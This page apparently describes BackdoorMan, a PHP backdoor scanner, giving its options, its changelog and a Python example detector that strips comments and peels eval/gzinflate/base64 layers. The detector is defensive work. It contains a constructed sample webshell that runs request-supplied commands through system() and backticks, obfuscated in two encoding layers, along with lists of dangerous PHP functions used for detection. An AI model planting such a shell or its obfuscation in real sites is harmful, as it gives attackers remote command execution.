      --no-color            do not use colors in the output
      --no-info             do not show file information
      --no-apis             do not use APIs during scan (not recommended)

The external services receive the scanned files, or data about them; use --no-apis when the site's code must not leave your environment.

Changelog

v1.0.0
- 1st release <https://github.com/yassineaddi/PHP-backdoor-detector>.

v2.0.0
- rename software to `BackdoorMan`.
- improve external services (APIs).
- separate databases from main script.
- lots of improvements (compared with the 1st release).

v2.1.0
- split the script into classes to optimize the software.

v2.2.0
- add `Servicer` class.
- rename classes.
- add `--no-color` option.
- add `--no-external-services` option.
- add `--no-file-info` option.
- improve `Reporter` class.
- improve software interface.
- small improvements.
- remove single-line and multi-line comments before scanning.
- add `--force` option.
- add UnPHP API.
- improve `activities.txt` database.

v2.2.1
- modify comments.

v2.3.1
- use a custom parser instead of regex to detect backticks (execution operator), due to false positives.
- improved report class.
- separate functions and activities into low, medium and high severity.
- rename options.
- add `-o, --output` option.
- add/modify comments.

Download BackdoorMan
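The three detection ideas the changelog mentions, comment stripping before scanning, a real tokenizer for the backtick execution operator, and recursive eval + gzinflate + base64 unwrapping, as an added Python 3 example. This is not BackdoorMan's code; the severity grouping is this example's own rather than the project's functions and activities databases, and the two PHP files are constructed here (the shell is built by wrapping a one-line command runner in two encoding layers, exactly the pattern the tool is meant to peel).

```python
import base64
import codecs
import re
import zlib

# Severity grouping is this example's own, not BackdoorMan's functions/activities databases.
SUSPICIOUS = {
    "high": ["eval", "assert", "create_function", "system", "exec", "shell_exec",
             "passthru", "popen", "proc_open"],
    "medium": ["base64_decode", "gzinflate", "gzuncompress", "str_rot13",
               "preg_replace", "file_put_contents", "move_uploaded_file"],
    "low": ["curl_exec", "fopen", "file_get_contents", "chmod"],
}
# One or more nested decoder calls wrapped around a single quoted literal.
CHAIN = re.compile(
    r"""((?:(?:eval|gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(\s*)+)(['"])(.*?)\2\s*\)+""",
    re.I | re.S)


def strip_comments(src):
    """Drop //, # and /* */ comments while stepping over string literals, so quoted text
    never counts. Also counts backtick pairs (PHP's execution operator) outside strings.
    Returns (code, backtick_pairs)."""
    out, i, n, backticks = [], 0, len(src), 0
    while i < n:
        c = src[i]
        if c in "'\"":                                  # string literal: copy verbatim
            j = i + 1
            while j < n and src[j] != c:
                j += 2 if src[j] == "\\" else 1
            out.append(src[i:j + 1])
            i = j + 1
        elif src.startswith("//", i) or c == "#":       # line comment
            j = src.find("\n", i)
            i = n if j < 0 else j
        elif src.startswith("/*", i):                   # block comment
            j = src.find("*/", i + 2)
            i = n if j < 0 else j + 2
        else:
            backticks += c == "`"
            out.append(c)
            i += 1
    return "".join(out), backticks // 2


def _apply(func, data):
    f = func.lower()
    if f == "base64_decode":
        return base64.b64decode(data)
    if f == "gzinflate":
        return zlib.decompress(data, -15)               # raw DEFLATE, like PHP gzinflate()
    if f == "gzuncompress":
        return zlib.decompress(data)                    # zlib stream, like PHP gzuncompress()
    if f == "str_rot13":
        return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")
    return data                                         # eval: payload is the next code layer


def deobfuscate(code, max_depth=10):
    """Peel nested decoder wrappers innermost-first and splice the plaintext back in.
    Returns (code, layers_unwrapped, wrapper_functions_seen)."""
    layers, used = 0, set()
    for _ in range(max_depth):
        m = CHAIN.search(code)
        if not m:
            break
        funcs = re.findall(r"[a-z0-9_]+", m.group(1), re.I)
        data = m.group(3).encode("latin-1")
        try:
            for func in reversed(funcs):
                data = _apply(func, data)
        except (ValueError, zlib.error):                # literal was not really encoded
            break
        used.update(f.lower() for f in funcs)
        code = code[:m.start()] + data.decode("latin-1") + code[m.end():]
        layers += 1
    return code, layers, used


def scan_php(src):
    code, _ = strip_comments(src)
    decoded, layers, used = deobfuscate(code)
    decoded, backticks = strip_comments(decoded)        # inner layers bring their own syntax
    findings = {"high": [], "medium": [], "low": []}
    for severity, names in SUSPICIOUS.items():
        for name in names:
            if name in used or re.search(r"\b%s\s*\(" % name, decoded, re.I):
                findings[severity].append(name)
    if backticks:
        findings["high"].append("backtick execution operator (x%d)" % backticks)
    if layers:
        findings["medium"].append("%d obfuscation layer(s) unwrapped" % layers)
    if findings["high"] and re.search(r"\$_(GET|POST|REQUEST|COOKIE)\b", decoded):
        findings["high"].append("request superglobal present alongside execution sink")
    return {"findings": findings, "decoded": decoded}


def _wrap_b64(php):
    return "eval(base64_decode('%s'));" % base64.b64encode(php.encode()).decode()


def _wrap_gz(php):
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)      # raw DEFLATE = PHP gzdeflate()
    raw = comp.compress(php.encode()) + comp.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()


# Constructed samples: a two-layer obfuscated one-line shell, and a benign file.
INNER_SHELL = "if(isset($_REQUEST['cmd'])){ echo `{$_REQUEST['cmd']}`; system($_REQUEST['cmd']); }"
SAMPLE_SHELL = "<?php\n// vendor header: the text eval( here must not count\n" + _wrap_gz(_wrap_b64(INNER_SHELL)) + "\n"
SAMPLE_CLEAN = "<?php\n/* eval( only inside a comment */\necho htmlspecialchars($_GET['name']);\n"

if __name__ == "__main__":
    for name, src in (("shell.php", SAMPLE_SHELL), ("clean.php", SAMPLE_CLEAN)):
        print(name, scan_php(src)["findings"])
```

Stripping comments first is what keeps a vendor header that merely mentions eval( from lighting up every file in the tree, and scanning the string literal itself is why the tokenizer walks quotes instead of regexing for backticks: a backtick inside "..." is data, not the execution operator. The superglobal check is co-occurrence, not data-flow analysis; treat it as a triage hint, not proof.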

Link: http://feedproxy.google.com/~r/PentestTools/~3/_ANWpsC6c4A/backdoorman-toolkit-that-helps-you-find.html